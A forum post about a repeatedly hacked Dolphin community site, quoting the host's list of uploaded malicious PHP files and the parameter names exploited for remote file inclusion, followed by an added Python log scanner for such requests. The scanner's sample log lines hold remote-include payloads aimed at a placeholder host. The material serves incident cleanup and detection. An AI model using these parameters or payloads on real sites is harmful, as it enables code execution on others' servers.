Hi,
I am running a patched version of 6.1 (upgraded from 6.0) and keep on getting hacked.
I have the following config:
register_globals = Off
magic_quotes_gpc = On
SAFE_MODE = OFF
allow_url_fopen = On
mod_rewrite = On
RewriteEngine = On
Here is the message I received from my host:
Your hosting account has been attacked via an insecure PHP
script.
- the following malicious files have been uploaded to your webspace:
./*******/media/ocra.php
./******/plugins/safehtml/writable.php
./openstar_4.01/index5.php
./*******/plugins/safehtml/HTMLSax3/popup.php
./t*******/ray/modules/chat/data/sounds/popup.php
Having disabled these files, we will unlock your account after this e-mail.
Please understand that the temporary lock of your account was necessary to
protect our infrastructure.
To reestablish the security of your webspace, please proceed now as follows:
Secure all security leaks in your scripts. We found successful
exploits through at least the following:
******* /index.php
$config[ppa_root_path],sourcedir,include_path,root_path,id,prefix,error_log,dir[plugins],sinpaTH,path[docroot],sIncPath,jamroom[jm_dir],idcat,buku_tamu,DOCUMENT_ROOT,page,abg_path,path_escape,pagename,pag,errors,WN_BASEDIR,root_dir,i,custompluginfile[],l,p,s,sbp,x,THEME_DIR
******** /Dolphin/
$config[ppa_root_path],sourcedir,include_path,root_path,id,prefix,error_log,dir[plugins],sinpaTH,path[docroot],sIncPath,idcat,buku_tamu,page,path_escape,pagename,pag,errors,WN_BASEDIR,root_dir,i,custompluginfile[],l,p,s,sbp,x,THEME_DIR
249 /********* /Dolphin/rate.php/plugins/safehtml/safehtml.php
$dir[plugins],dir[plugins]%7Dsafehtml
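
Added example, not part of the original post or the host's message: a small scanner for the site's web server access log that flags requests where one of the parameter names from the host's report carries a remote URL. It assumes an Apache common/combined log format and that the exploit values were remote URLs fetched by PHP includes; the sample log lines, IP addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qsl

# Parameter names copied from the host's report above (a subset of its list).
REPORTED_PARAMS = {
    "dir[plugins]", "sIncPath", "include_path", "root_path", "sourcedir",
    "path[docroot]", "DOCUMENT_ROOT", "THEME_DIR", "root_dir", "WN_BASEDIR",
}
# Assumption: the exploit values were remote URLs, which PHP's include() will
# fetch when allow_url_fopen is On (and URL includes are not disabled).
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Apache common/combined log prefix: ip, timestamp, request line, status.
REQUEST = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})'
)

def suspicious_params(target):
    """Return (name, value) pairs where a reported parameter carries a URL."""
    query = target.partition("?")[2]
    # parse_qsl percent-decodes once, as PHP does, so dir%5Bplugins%5D matches.
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True)
            if n in REPORTED_PARAMS and REMOTE_VALUE.match(v)]

def scan(lines):
    """Return one finding per flagged parameter in the given log lines."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, when, target, status = m.groups()
        for name, value in suspicious_params(target):
            findings.append({"ip": ip, "time": when, "param": name,
                             "path": target.partition("?")[0],
                             "value": value, "status": int(status)})
    return findings

# Constructed sample lines (documentation IPs, example.invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /Dolphin/index.php?sIncPath=http://example.invalid/a.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2008:10:00:05 +0000] "GET /Dolphin/index.php?dir%5Bplugins%5D=http%3A%2F%2Fexample.invalid%2Fb.txt HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Jan/2008:10:01:00 +0000] "GET /Dolphin/index.php?root_path=/var/www HTTP/1.1" 200 2048',
    '198.51.100.8 - - [01/Jan/2008:10:02:00 +0000] "GET /Dolphin/index.php?next=http://example.invalid/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["path"], f["param"], "=", f["value"])
```

Findings with a 200 status point at the scripts that still need fixing; the timestamps give a window for checking what else was uploaded.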